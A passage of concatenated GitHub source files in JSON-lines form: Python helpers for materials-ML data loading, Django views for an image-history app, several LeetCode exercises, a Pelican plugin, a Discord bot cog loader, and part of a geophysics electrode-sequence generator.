matdeeplearn.preprocessor.datasets.StructureDataset\n a dataset object that contains the target data\n\n train_size: float\n a float between 0.0 and 1.0 that represents the proportion\n of the dataset to use as the training set\n\n valid_size: float\n a float between 0.0 and 1.0 that represents the proportion\n of the dataset to use as the validation set\n\n test_size: float\n a float between 0.0 and 1.0 that represents the 
proportion\n of the dataset to use as the test set\n \"\"\"\n \n if train_size + valid_size + test_size > 1:\n warnings.warn(\"Invalid sizes detected (ratios add up to larger than one). Using default split of 0.8/0.05/0.15.\")\n train_size, valid_size, test_size = 0.8, 0.05, 0.15\n\n dataset_size = len(dataset)\n\n train_len = int(train_size * dataset_size)\n valid_len = int(valid_size * dataset_size)\n test_len = int(test_size * dataset_size)\n unused_len = dataset_size - train_len - valid_len - test_len\n\n (train_dataset, val_dataset, test_dataset, unused_dataset) = random_split(\n dataset,\n [train_len, valid_len, test_len, unused_len],\n )\n\n return train_dataset, val_dataset, test_dataset\n\ndef get_otf_transforms(transform_list: List[dict]):\n \"\"\"\n get on the fly specific transforms\n\n Parameters\n ----------\n\n transform_list: transformation function/classes to be applied\n \"\"\"\n\n transforms = []\n # set transform method\n for transform in transform_list:\n if transform.get(\"otf_transform\", False):\n transforms.append(\n registry.get_transform_class(\n transform[\"name\"],\n **transform.get(\"args\", {})\n )\n )\n \n return transforms\n\ndef get_dataset(\n data_path,\n processed_file_name,\n transform_list: List[dict] = [],\n large_dataset=False,\n dataset_device=None,\n):\n \"\"\"\n get dataset according to data_path\n this assumes that the data has already been processed and\n data.pt file exists in data_path/processed/ folder\n\n Parameters\n ----------\n\n data_path: str\n path to the folder containing data.pt file\n\n transform_list: transformation function/classes to be applied\n \"\"\"\n\n # get on the fly transforms for use on dataset access\n otf_transforms = get_otf_transforms(transform_list)\n\n # check if large dataset is needed\n if large_dataset:\n Dataset = LargeStructureDataset\n else:\n Dataset = StructureDataset\n\n composition = Compose(otf_transforms) if len(otf_transforms) >= 1 else None\n \n dataset = Dataset(data_path, processed_data_path=\"\", processed_file_name=processed_file_name, transform=composition, device=dataset_device)\n\n return dataset\n\n\ndef get_dataloader(\n dataset, batch_size: int, num_workers: int = 8, sampler=None, shuffle=True\n):\n \"\"\"\n Returns a single dataloader for a given dataset\n\n Parameters\n ----------\n dataset: matdeeplearn.preprocessor.datasets.StructureDataset\n a dataset object that contains the target data\n\n batch_size: int\n size of each batch\n\n num_workers: int\n how many subprocesses to use for data loading. 
0 means that\n        the data will be loaded in the main process.\n    \"\"\"\n\n    # load data\n    try: \n        device = str(dataset.dataset[0].pos.device)\n    except:\n        device = str(dataset[0].pos.device)\n    \n    if device == \"cuda:0\" or device == \"cuda\":\n        loader = DataLoader(\n            dataset,\n            batch_size=batch_size,\n            shuffle=(sampler is None),\n            num_workers=0,\n            pin_memory=False,\n            sampler=sampler,\n        )\n    else:\n        loader = DataLoader(\n            dataset,\n            batch_size=batch_size,\n            shuffle=(sampler is None),\n            num_workers=num_workers,\n            pin_memory=True,\n            sampler=sampler,\n        )\n    return loader\n","repo_name":"Fung-Lab/MatDeepLearn_dev","sub_path":"matdeeplearn/common/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":4691,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"37"} +{"seq_id":"14765376008","text":"from django.http import HttpResponseRedirect, HttpResponse\nfrom django.http.response import StreamingHttpResponse\nfrom django.contrib.auth.hashers import make_password, check_password\nfrom django.shortcuts import render\nfrom django.http import JsonResponse\nfrom django.core.paginator import Paginator, PageNotAnInteger, EmptyPage, InvalidPage\nimport sqlite3\nimport json\nimport random\nimport time\nimport datetime\nimport pytz\nimport os\nfrom math import *\nfrom . import rules\n\n\ndef switch_time(time_stamp):\n    '''\n\t\tFunction: convert a timestamp to Beijing time\n        Input: int, timestamp in milliseconds\n        Output: str, the corresponding Beijing time\n\t'''\n    mili_second = time_stamp % 1000\n    new_time_stamp = floor(time_stamp / 1000)\n    time_array = time.localtime(new_time_stamp) \n    time_real = time.strftime(\"%Y-%m-%d %H:%M:%S\", time_array)\n    time_real += '.'\n    time_real += str(mili_second).rjust(3,'0') \n    #print(time_real)\n    return time_real\n\n\ndef getCurTime():\n    '''\n    \tFunction: get the current timestamp in milliseconds\n        Output: int, timestamp (milliseconds)\n    '''\n    curtime = int(time.time() * 1000)\n    return curtime\n\n\ndef show_index(request): \n    '''\n    \tFunction: handle requests to /index (the home page)\n    '''\n\n    context = {}\n    username = rules.judge_whether_loaded(request)\n    if(username == None):\n        #not logged in, report an error\n        response = HttpResponseRedirect('/error') \n        return response\n    else:\n        context['username'] = username\n    return render(request, 'index.html', context)\n\ndef show_error(request):\n    '''\n    \tFunction: handle requests to /error; visiting the home page, history or delete pages while not logged in sends you back to login, and visiting login or signup while already logged in sends you back to the home page\n    '''\n    context = {}\n    username = rules.judge_whether_loaded(request)\n    if(username != None):\n        #already logged in, report an error\n        context['logged'] = True\n    else:\n        #not logged in\n        context['logged'] = False\n    return render(request, 'error.html', context)\n\n\ndef show_logout(request):\n    '''\n    \tFunction: handle requests to /logout\n    '''\n    rules.logout(request)\n    response = HttpResponseRedirect('/login')\n    #response.set_cookie('session_id', None)\n    return response\n\ndef show_logon(request):\n    '''\n    \tFunction: handle requests to /logon (sign up)\n        On success, return the username\n        On failure, return an error code\n    '''\n    context = {}\n    show_data = {}\n    username = rules.judge_whether_loaded(request)\n    if(username != None):\n        #already logged in, report an error\n        response = HttpResponseRedirect('/error') \n        return response\n    if request.method == 'POST':\n        show_data = rules.logon(request)\n        if \"error\" in show_data.keys():\n            context[\"message\"] = show_data[\"error\"]\n            context[\"result\"] = \"error\"\n        else:\n            context[\"result\"] = \"注册成功!\"\n            context[\"message\"] = \"用户名为\" + str(show_data[\"user\"]) \n    return render(request, 'logon.html', context)\n\ndef show_login(request):\n    '''\n    \tFunction: handle requests to /login\n        On success, redirect to the home page\n        On failure, return an error code\n    '''\n    context = {}\n    show_data = {}\n    username = rules.judge_whether_loaded(request)\n    if(username != None):\n        #already logged in, report an error\n        response = HttpResponseRedirect('/error') \n        return response\n    if request.method == 'POST':\n        show_data = rules.login(request)\n        if \"error\" in show_data.keys():\n            context[\"message\"] = show_data[\"error\"]\n            context[\"result\"] = \"error\" \n            return render(request, 'login.html', context)\n        else:\n            response = HttpResponseRedirect('/index') \n            response.set_cookie('session_id', show_data[\"session\"])\n            return response\n    else:\n        return render(request, 'login.html', context)\n\n    \ndef show_service(request):\n    '''\n    \tFunction: handle the home page's image viewing feature\n        Convert the base64 image returned by the backend into a src that a frontend img tag can display, then return it\n    '''\n    response_content = rules.service(request)\n    response_content[\"original\"] = \"data:image/jpeg;base64,\" + response_content[\"original\"][ : ]\n    response_content[\"result\"] = \"data:image/jpeg;base64,\" + response_content[\"result\"][ : ]\n    #print(response_content)\n    return JsonResponse(response_content)\n\n#x is a history record, used as the sort key\ndef f(x):\n    return int(x[\"time\"])\n\ndef show_history(request):\n    '''\n    \tFunction: handle the /history/ url and show history records\n        Find and show all records, or records filtered by time, with pagination\n    '''\n    context = {}\n    username = rules.judge_whether_loaded(request)\n    if(username == None):\n        #not logged in, report an error\n        response = HttpResponseRedirect('/error') \n        return response\n    else:\n        context['username'] = username\n    if request.method == \"GET\":\n        #convert the times entered on the frontend into timestamps for the backend; pass None if no time was entered\n        try:\n            start_date = str(request.GET.get(\"start_date\"))\n            end_date = str(request.GET.get(\"end_date\"))\n            start_time = start_date[ : ] + \" 00:00:00\"\n            end_time = end_date[ : ] + \" 23:59:59\"\n            start = time.mktime(time.strptime(start_time, '%Y-%m-%d %H:%M:%S')) * 1000\n            end = time.mktime(time.strptime(end_time, '%Y-%m-%d %H:%M:%S')) * 1000\n            assert start and end\n        except:\n            start = None\n            end = None\n        #query all records, sorted by time in descending order\n        get_list = rules.query_date(request, start, end)\n        for item in get_list[\"list\"]:\n            item[\"time\"] = int(item[\"time\"])\n        get_list[\"list\"].sort(key = f, reverse = True)\n        record_list = []\n        #convert the returned data into the form displayed on the frontend\n        for item in get_list[\"list\"]:\n            new_dict = {}\n            new_dict[\"username\"] = item[\"username\"]\n            new_dict[\"name\"] = item[\"name\"]\n            new_dict[\"id\"] = str(item[\"record_id\"])\n            if item[\"content\"] == \"No URL.\":\n                new_dict[\"type\"] = \"本地图片\"\n            else:\n                new_dict[\"type\"] = \"网络下载\"\n            new_dict[\"time\"] = switch_time(int(item[\"time\"]))\n            record_list.append(new_dict)\n        #paginate the display\n        #split the data into pages of 10 records each\n        paginator = Paginator(record_list, 10)\n        # get the value of the page parameter in the url; the first page omits it, so the default is 1 \n        try:\n            page = request.GET.get('page')\n            records = paginator.page(page)\n        except:\n            #if the requested page number is invalid, return the first page\n            records = paginator.page(1)\n        context['records'] = records\n        return render(request, \"history.html\", context)\n\ndef show_details(request):\n    '''\n    \tFunction: handle the /detail/ url and show a single history record\n        Fetch the data and images of a single history record and display them\n    '''\n    username = rules.judge_whether_loaded(request)\n    if(username == None):\n        #not logged in, report an error\n        response = HttpResponseRedirect('/error') \n        return response\n    record = rules.get(request)\n    if \"error\" in record.keys():\n        #record not found, report an error\n        response = HttpResponseRedirect('/not_found') \n        return response\n    #convert the returned content into the form displayed on the frontend\n    context = {}\n    context[\"username\"] = record[\"username\"]\n    context[\"id\"] = record[\"record_id\"]\n    context[\"name\"] = record[\"name\"]\n    context[\"time\"] = switch_time(int(record[\"time\"]))\n    if record[\"content\"] == \"No URL.\":\n        context[\"type\"] = \"本地图片\"\n    else:\n        context[\"type\"] = \"网络下载\"\n    context[\"original\"] = \"data:image/jpeg;base64,\" + record[\"base64_image\"]\n    context[\"result\"] = \"data:image/jpeg;base64,\" + record[\"base64_result\"]\n    return render(request, \"detail.html\", context)\n\ndef show_delete(request):\n    '''\n    \tFunction: handle the /delete/ url and delete a single history record\n    '''\n    username = rules.judge_whether_loaded(request)\n    if(username == None):\n        #not logged in, report an error\n        response = HttpResponseRedirect('/error') \n        return response\n    record = rules.delete(request)\n    if \"error\" in record.keys():\n        #record not found, report an error\n        response = HttpResponseRedirect('/not_found') \n        return response\n    response = HttpResponseRedirect('/history/') \n    return response\n\ndef show_not_found(request):\n    '''\n    \tFunction: handle requests to /not_found; shown when a history record does not exist, the user has no permission to view it, or the record is invalid (e.g. the image is corrupted, in the wrong format, or cannot be downloaded or opened)\n    '''\n    context={}\n    return render(request, \"not_found.html\", context)\n    \ndef delete_many(request):\n    '''\n    \tFunction: delete multiple history records selected by time range\n    '''\n    context = {}\n    username = rules.judge_whether_loaded(request)\n    if(username == None):\n        #not logged in, report an error\n        response = HttpResponseRedirect('/error') \n        return response\n    else:\n        context['username'] = username\n    #convert the entered times into timestamps\n    try:\n        start_date = str(request.POST.get(\"start_date\"))\n        end_date = str(request.POST.get(\"end_date\"))\n        start_time = start_date[ : ] + \" 00:00:00\"\n        end_time = end_date[ : ] + \" 23:59:59\"\n        start = time.mktime(time.strptime(start_time, '%Y-%m-%d %H:%M:%S')) * 1000\n        end = time.mktime(time.strptime(end_time, '%Y-%m-%d %H:%M:%S')) * 1000\n        assert start and end\n    except:\n        start = None\n        end = None\n    #query all matching records\n    get_list = rules.query_date(request, start, end)\n    delete_list = []\n    #delete the database rows and files one by one\n    for item in get_list[\"list\"]:\n        rules.delete_record(item[\"username\"], int(item[\"record_id\"]))\n        try:\n            os.remove(os.path.join(\"database\", item[\"username\"], str(item[\"record_id\"]) + \".jpeg\"))\n            os.remove(os.path.join(\"database\", item[\"username\"], str(item[\"record_id\"]) + \"_result.jpeg\"))\n        except:\n            pass\n    return render(request, \"history.html\", context)\n","repo_name":"SerCharles/Picture-Manager","sub_path":"hw4/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":10410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10108289209","text":"import collections\n\n\nclass Solution:\n    def mostCommonWord(self, paragraph: str, banned: List[str]) -> str:\n\n        banned = set(banned)\n        normalized_str = ''\n\n        for c in paragraph:\n            if c.isalnum():\n                normalized_str += c\n            else:\n                normalized_str += ' '\n\n        _map = collections.defaultdict(int)\n        maxCount = 0\n        res = ''\n\n        for word in normalized_str.split():\n            word = word.lower()\n\n            if word in banned:\n                continue\n\n            _map[word] += 1\n\n            if maxCount < _map[word]:\n                maxCount = _map[word]\n                res = word\n\n        return res","repo_name":"sindhuvahinis/leetcode","sub_path":"2020/74.py","file_name":"74.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"28720353411","text":"# Given a string, return a version without the first and last char, so \"Hello\" yields \"ell\". 
The string length will be at least 2.\n\n\n# withoutEnd(\"Hello\") → \"ell\"\n# withoutEnd(\"java\") → \"av\"\n# withoutEnd(\"coding\") → \"odin\"\n\n\ndef word(a):\n\tn=len(a)\n\tb=a[1:n-1]\n\treturn b\n\na=input(\"Enter the word:\")\nprint(word(a))","repo_name":"aamiriqbal071/CodingBat","sub_path":"String-1/withoutEnd.py","file_name":"withoutEnd.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36413597550","text":"# -*- coding: utf-8 -*-\n\"\"\"\nHandle registration and setup for plugin\n\"\"\"\nimport logging\nfrom blinker import signal\nfrom .content_adapter import GitContentAdapter\nfrom pelican import signals\n\nDEV_LOGGER = logging.getLogger(__name__)\n\ncontent_git_object_init = signal('content_git_object_init')\n\ndef send_content_git_object_init(content):\n content_git_object_init.send(content, git_content=GitContentAdapter(content))\n\n\ndef setup_option_defaults(pelican_inst):\n pelican_inst.settings.setdefault('GIT_FILETIME_FROM_GIT', True)\n pelican_inst.settings.setdefault('GIT_HISTORY_FOLLOWS_RENAME', True)\n pelican_inst.settings.setdefault('GIT_SHA_METADATA', True)\n pelican_inst.settings.setdefault('GIT_GENERATE_PERMALINK', False)\n\n\ndef register():\n signals.content_object_init.connect(send_content_git_object_init)\n signals.initialized.connect(setup_option_defaults)\n\n # Import actions\n from . import actions\n","repo_name":"getpelican/pelican-plugins","sub_path":"filetime_from_git/registration.py","file_name":"registration.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","stars":1367,"dataset":"github-code","pt":"37"} +{"seq_id":"34425267818","text":"# link : https://leetcode.com/problems/koko-eating-bananas/description/\n# author : Mohamed Ibrahim\n\n\nclass Solution:\n def minEatingSpeed(self, piles: List[int], h: int) -> int:\n mx = max(piles)\n if len(piles) == h:\n return mx\n left,right = 1,mx\n res = mx\n while left <= right:\n mid = (left+right) // 2\n k = 0\n for i in piles:\n k+=ceil(i/mid)\n if k <= h: \n res = min(res,mid)\n right = mid-1\n else:\n left = mid+1\n return res\n \n \n","repo_name":"M0hamedIbrahim1/-Data-Structure-Algorithms","sub_path":"Searching Algorithms/BinarySearch/Problems/875. Koko Eating Bananas.py","file_name":"875. 
Koko Eating Bananas.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"22239782951","text":"class Solution:\n    # @param A, a list of integers\n    # @param target, an integer to be searched\n    # @return a list of length 2, [index1, index2]\n    def searchRange(self, A, target):\n        i = 0\n        j = len(A) - 1\n        while i <= j:\n            mid = (i + j) // 2  # integer division so mid stays a valid index in Python 3\n            if target == A[mid]:\n                low = high = mid\n                while low >= 0 and target == A[low]:\n                    low -= 1\n                while high < len(A) and target == A[high]:\n                    high += 1\n                return [low + 1, high - 1]\n            elif target > A[mid]:\n                i = mid + 1\n            else:\n                j = mid - 1\n        return [-1, -1]","repo_name":"zhexiong/LTC","sub_path":"search_for_a_range.py","file_name":"search_for_a_range.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16865305678","text":"from typing import List\n\n\nclass Solution:\n    def combinationSum(self, candidates: List[int], target: int) -> List[List[int]]:\n        # depth-first search + backtracking + pruning\n        self.res = []\n        track = []\n\n        def traceback(s: int, track: List[int]):\n            if s == target:  # found a valid combination\n                self.res.append(track[:])\n                return\n            if s > target:  # current sum already exceeds the target, prune\n                return\n\n            for num in candidates:  # iterate over the candidate list\n                if not track or num >= track[-1]:  # to avoid duplicates, keep track a non-decreasing sequence\n                    track.append(num)\n                    traceback(s + num, track)  # recurse downwards\n                    track.pop()  # backtrack\n\n        traceback(0, track)\n        return self.res\n","repo_name":"tangxyw/LeetCode","sub_path":"python/Traceback/[39]组合总和.py","file_name":"[39]组合总和.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"33090204770","text":"import os\nimport logging\nimport logging.config\n\n\nlogger = None\n_logs_path = '/tmp/ipcam'\n_logger_conf_file = 'logger.conf'\n_logger_name = 'root'\n\n\ndef init_logger():\n    global logger\n    if not os.path.exists(_logs_path):\n        os.mkdir(_logs_path)\n    logger_conf_path = os.path.abspath(os.path.join(os.path.dirname(__file__), _logger_conf_file))\n    logging.config.fileConfig(logger_conf_path)\n    logger = logging.getLogger(_logger_name)\n\n\ninit_logger()\n\n_ctx = None\n\n\ndef setContext(ctx):\n    global _ctx\n    logger.info(\"=========Context set=========\")\n    _ctx = ctx\n\n\ndef getContext():\n    global _ctx\n    return _ctx\n\n\nclass Context(object):\n    def __init__(self, conf, reporter):\n        self.conf = conf\n        self.reporter = reporter\n","repo_name":"zhoujohn/Elec_Solution2","sub_path":"context.py","file_name":"context.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"26969416267","text":"import discord, os\nfrom discord.ext import commands\nfrom last_fork.config import settings\nfrom colorama import init, Fore\n\nintents = discord.Intents.default()\nintents.members = True\nclient = commands.Bot(command_prefix = \"*\", intents=intents)\nclient.remove_command(\"help\")\n\n@client.command()\nasync def load(ctx, extension):\n\tclient.load_extension(f'cogs.{extension}')\n\tawait ctx.send(f\"{extension} loaded...\")\n\tprint(Fore.GREEN + f'{ctx.message.author} loaded {extension}')\n\n@client.command()\nasync def unload(ctx, extension):\n\tclient.unload_extension(f'cogs.{extension}')\n\tawait ctx.send(f\"{extension} unloaded...\")\n\tprint(Fore.GREEN + f'{ctx.message.author} unloaded {extension}')\n\n@client.command()\nasync def reload(ctx, 
extension):\n\tclient.unload_extension(f'cogs.{extension}')\n\tclient.load_extension(f'cogs.{extension}')\n\tawait ctx.send(f\"{extension} reloaded...\")\n\tprint(Fore.GREEN + f'{ctx.message.author} reloaded {extension}')\n\nfor filename in os.listdir(\"./cogs\"):\n\tif filename.endswith(\".py\"):\n\t\tclient.load_extension(f'cogs.{filename[:-3]}')\n\t\tinit()\n\t\tprint(Fore.MAGENTA + f\"{filename[:-3]} \" + Fore.LIGHTBLACK_EX + \"loaded\")\n\nprint(Fore.BLUE + \"ALL EXTENSIONS \" + Fore.LIGHTBLACK_EX + \"loaded\")\n \nclient.run(settings['token'])","repo_name":"CatsAreGood1337/Discord-nuke-bot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":1241,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"37"} +{"seq_id":"40911093955","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[7]:\n\n\nimport numpy as np\n\narr = np.array([[1,2],\n              [3,4]])\neig_val, eig_vec = np.linalg.eig(arr)\ndeterminant = np.linalg.det(arr)\nprint(\"Eigenvalues : {}\".format(eig_val))\nprint(\"Eigenvectors : {}\".format(eig_vec))\nprint(\"Determinant : {}\".format(int(determinant)))\n\nvec1 = np.array([1,2,3])\nvec2 = np.array([4,5,6])\ncross_product = np.cross(vec1, vec2)\nprint(\"Cross product : {}\".format(cross_product))\nA = np.array([[1,2,-2],\n             [2,1,-5],\n             [1,-4,1]])\nB = np.array([-15,-21,18])\n\nx = np.linalg.solve(A,B)\nprint(\"Solution : {}\".format(x))\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"kimyeoungrok/HW7_KYR","sub_path":"Q1/q1.py","file_name":"q1.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1907105481","text":"import numpy as np\n\n#definitions\nCellWidth= 200\nCellHeight= 400\nServiceWidth= 400\nNoOfColumnAtLeft= 4\nNoOfColumnAtRight= 4\nNoOfRaw= 4\nDeltaYFromTop= 30\nCellHeightFromHead= 380\n\nNoOfColumn = NoOfColumnAtLeft + NoOfColumnAtRight\nNoOfTotalCells = (int) (NoOfColumn * NoOfRaw)\nfor i in range(NoOfTotalCells):\n    idx = i+1\n    innerColumn = ((idx - 1) % NoOfColumn) + 1\n    innerRaw = np.floor ((idx - 1) / NoOfColumn)\n    if innerColumn == 0:\n        innerColumn = NoOfColumn\n    yPosition = innerRaw * CellHeight + DeltaYFromTop\n    if innerColumn <= NoOfColumnAtLeft:\n        xPosition = CellWidth * innerColumn - CellWidth / 2\n        iD = innerRaw * NoOfColumnAtLeft + innerColumn\n        if innerRaw == (NoOfRaw - 1):\n            shelfNumber = 0\n        else:\n            shelfNumber = innerRaw + 1\n    else:\n        xPosition = CellWidth * innerColumn + ServiceWidth - CellWidth / 2\n        iD = innerRaw * NoOfColumnAtRight + innerColumn - NoOfColumnAtLeft + 100\n        if innerRaw == (NoOfRaw - 1):\n            shelfNumber = 0\n        else:\n            shelfNumber = innerRaw + NoOfRaw\n    height = CellHeightFromHead\n    tarr = [int(height), int(xPosition), int(yPosition), int(iD), int(shelfNumber)]\n    print(\"new AppConfigSvc.CellDefinition() {{ HeightMM = {0}, XPosMM = {1}, YPosMM = {2}, cellId = {3}, shelfNumber = {4} }},\".format(tarr[0], tarr[1], tarr[2], tarr[3], tarr[4]))\n","repo_name":"doronweiss/pythontesta","sub_path":"Bitncam/cellsconfig.py","file_name":"cellsconfig.py","file_ext":"py","file_size_in_byte":1391,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"21340173982","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Nov 23 15:11:21 2020\n@author: Benjamin\n\"\"\"\nfrom pygimli.meshtools import readGmsh\nimport numpy as np\nimport pybert as pb\nimport os \nfrom pygimli.viewer.mpl import drawStreams\nfrom scipy import interpolate\nimport 
matplotlib.pyplot as plt\nimport pygimli as pg\n \nclass fct_utils(): \n\n def definePath(main,date,**kwargs):\n #%% define PATHS \n # or set you working directory local path here \n #main = os.getcwd()\n #os.chdir(main)\n \n geomPath= './geom/'\n meshPath= './mesh/'\n icsdPath= './icsd/'\n figPath= './fig/'\n processedPath= './processed_data/'\n \n rmvInvalid = False\n all_gates = False\n Nfix = False\n gateIP = False\n \n icsdPath += date \n if rmvInvalid is False: \n icsdPath += '_raw' \n if all_gates: \n icsdPath += '_AllG' \n if Nfix: \n icsdPath += '_Nfix' \n if gateIP: \n icsdPath += '_M' + str(gateIP)\n icsdPath += '/'\n \n figPath += date + '/'\n if not os.path.exists(figPath):\n os.makedirs(figPath)\n\n processedPath += date + '/'\n if not os.path.exists(processedPath):\n os.makedirs(processedPath)\n \n \n return geomPath, meshPath, icsdPath, figPath, processedPath\n\n\n#%% ------- MALM -----------------------------------------------------####\n\n def mk_seqMALM(a_injection = 72, b_return = 2, sensors=None, mesh=None, \n Syscal=None, Rec=None, \n PosXYZid=None,Ch_return=None, \n mfix=False, Bmove=(False,[]), mref=40,\n savefig=False,SaveName=None):\n \n \"\"\"\n write the rhizotron malm sequence\n parameters:\n ===\n * a_injection: number of the electrode used for injection (t: int) , default = 1\n * b_return: number of the electrode used as return (t: int), default = 2\n * b_return associated with Ch_return --> b_return_left = b_return[0], while b_return_right = b_return[1] \n returns:\n ===\n * seq: malm sequence (t: np.ndarray)\n \"\"\"\n print('*' * 20)\n\n # function \n a = a_injection -1 \n b= b_return - 1 \n\n seq = []\n \n if mfix==True:\n m = mref -1\n electrodes = np.arange(1,len(sensors))\n for row in electrodes:\n print(row)\n n = row\n seq.append([a, b, m, n]) \n\n \n else:\n # horizontal\n electrodes = np.arange(0,72)\n electrodes = electrodes.reshape((9,8))\n for row in electrodes:\n for i in range(len(row) -1):\n m = row[i]\n n = row[i + 1]\n seq.append([a, b, m, n])\n \n # vertical\n rotated_electrodes = np.flipud(np.rot90(electrodes))\n for row in rotated_electrodes:\n for i in range(len(row) -1):\n m = row[i]\n n = row[i + 1]\n seq.append([a, b, m, n])\n \n # diag \\ -6 : 6\n for d in range(-6, 7):\n diagonal = np.diag(electrodes, k = d)\n for i in range(len(diagonal) - 1):\n m = diagonal[i]\n n = diagonal[i + 1]\n seq.append([a, b, m, n])\n \n # diag / \n flipped_electrodes = np.fliplr(electrodes)\n for d in range(-6, 7):\n diagonal = np.diag(flipped_electrodes, k = d)\n for i in range(len(diagonal) - 1):\n m = diagonal[i]\n n = diagonal[i + 1]\n seq.append([a, b, m, n])\n \n # remove where the same electrode appears twice\n sequence = np.array(seq)\n\n indices_delete = []\n for i, row in enumerate(sequence):\n if len(np.unique(row)) != len(row):\n indices_delete.append(i)\n sequence_clean = np.delete(sequence, indices_delete, axis = 0)\n sequence_clean = np.vstack(sequence_clean)\n\n\n id2Remove=[]\n if PosXYZid is not None:\n print('-' * 5)\n print('Split case remove wrong quadripoles and adapt return electrode')\n PosXYZid=np.array(PosXYZid)\n Left=np.array(PosXYZid[0,:]) \n Right=np.array(PosXYZid[1,:]) \n print('TEST1: IF M and N are on the same SIDE')\n print('TEST2: IF B return same side as M and N')\n for i in range(0,len(sequence_clean)):\n # check if line ismenber of left or right\n # ---------# \n # 1st TEST #\n # TEST IF M and N are on the same SIDE\n # ---------# \n# print(sequence_clean[i, 2:4])\n Left_Test = any(elem in sequence_clean[i, 2:4]+1 
for elem in Left)\n Right_Test = any(elem in sequence_clean[i, 2:4]+1 for elem in Right) \n #print('Left_Test=' + str(Left_Test) + ' Right_Test=' + str(Right_Test))\n if i in id2Remove:\n continue\n try:\n if all([Left_Test,Right_Test])==True:\n id2Remove.append(i)\n except:\n continue \n\n if Ch_return is not None:\n # ---------# \n # 2nd TEST #\n # TEST IF B return same side as M and N \n # ---------# \n B_Test = b_return in Left\n if (B_Test==False and Left_Test==True):\n sequence_clean[i, 1]=Ch_return\n \n print('sequence before removed split=' + str(len(sequence_clean)))\n sequence_clean= np.delete(sequence_clean,id2Remove, axis=0)\n print('sequence after removed split=' + str(len(sequence_clean)))\n \n # remove where the same electrode appears twice\n sequence = np.array(sequence_clean)\n indices_delete = []\n for i, row in enumerate(sequence):\n if len(np.unique(row)) != len(row):\n indices_delete.append(i)\n print(indices_delete)\n \n sequence_clean = np.delete(sequence, indices_delete, axis = 0)\n sequence_clean = np.vstack(sequence_clean)\n\n if Bmove[0]==True:\n sequence_clean_base= sequence_clean\n for b in Bmove[1]:\n print('b=' + str(b))\n for i in range(0,len(sequence_clean_base)):\n sequence_clean_b= sequence_clean_base\n #print(i,b)\n sequence_clean_b[i, 1]=b\n sequence_clean= np.vstack([sequence_clean,sequence_clean_b])\n\n # remove where the same electrode appears twice\n sequence = np.array(sequence_clean)\n indices_delete = []\n for i, row in enumerate(sequence):\n if len(np.unique(row)) != len(row):\n indices_delete.append(i)\n \n sequence_clean = np.delete(sequence, indices_delete, axis = 0)\n sequence_clean = np.vstack(sequence_clean)\n \n if Rec==True:\n print('add rec')\n sequence_cleanR=sequence_clean[:,[2,3,0,1]] \n sequence_clean= np.vstack([sequence_clean,sequence_cleanR])\n \n schemeMALM = pb.DataContainerERT()\n schemeMALM.resize(len(sequence_clean)) \n for i, j in enumerate(\"abmn\"):\n schemeMALM.set(j, sequence_clean[:, i])\n\n\n if mesh!=None: \n sensors=[]\n posXYZ=[]\n for node in mesh.nodes():\n if node.marker() == -99:\n sensors.append(node.pos())\n posXYZ.append(np.array(node.pos()))\n\n if len(sensors)>0: \n schemeMALM.setSensorPositions(sensors)\n schemeMALM.set(\"valid\", np.ones(len(sequence_clean)))\n if PosXYZid is not None:\n schemeMALM.save('SequenceMALM_Rhizo_72Elecs_splitted.shm')\n else:\n schemeMALM.save('SequenceMALM_Rhizo_72Elecs.shm')\n \n \n schemeMALM.setSensorPositions(sensors)\n schemeMALM.set(\"valid\", np.ones(len(sequence_clean)))\n if PosXYZid is not None:\n schemeMALM.save('SequenceMALM_Rhizo_72Elecs_splitted.shm')\n else:\n schemeMALM.save('SequenceMALM_Rhizo_72Elecs.shm')\n \n if Syscal==True:\n print('Write syscal sequence file')\n posXYZ= np.vstack(posXYZ)\n posXYZ_ElectrPro= [np.arange(1,len(posXYZ)+1),np.zeros([2,len(posXYZ[:,0])])]\n posXYZ_ElectrPro= np.vstack(posXYZ_ElectrPro).T\n nb = np.arange(1,len(posXYZ_ElectrPro)+1)\n posXYZ_nb= np.column_stack((nb,posXYZ_ElectrPro))\n measSyScal= sequence_clean+1\n nb = np.arange(1,len(measSyScal)+1)\n measSyScal_nb= np.column_stack((nb,measSyScal))\n if PosXYZid is not None:\n fileName='MALMR'+ str(np.amax(measSyScal)) +'_Splitted.txt'\n else:\n fileName='MALMR'+ str(np.amax(measSyScal)) +'.txt'\n f = open(fileName,'w')\n np.savetxt(f, posXYZ_nb, fmt='%d %1.2f %1.2f %1.2f', delimiter='\\t',header='X Y Z') # X is an array\n np.savetxt(f, measSyScal_nb, fmt='%d', delimiter='\\t',header='A\t B\t M\t N') # X is an array\n f.close()\n\n if savefig==True:\n plt.ioff()\n fig = 
